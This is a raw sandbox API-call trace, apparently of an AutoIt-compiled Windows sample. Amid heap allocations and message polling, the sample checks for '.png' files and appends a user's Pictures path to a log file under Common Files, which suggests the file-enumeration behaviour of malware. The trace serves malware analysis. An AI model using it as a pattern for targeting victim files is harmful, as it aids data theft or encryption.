0x90d420 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.246] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.247] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.265] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.265] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.265] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.266] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.266] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.266] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.266] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.266] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.266] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.267] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.267] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x319d, lpOverlapped=0x0) returned 1 [0191.267] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.267] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x319d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.267] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0191.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa548 [0191.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\n", cchWideChar=72, lpMultiByteStr=0x9aa548, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 72 [0191.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0191.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0191.267] WriteFile (in: hFile=0x160, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0191.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0191.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.268] CloseHandle (hObject=0x160) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.270] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.270] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.271] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.271] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.271] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.271] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.272] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0191.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.276] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.276] RtlAllocateHeap 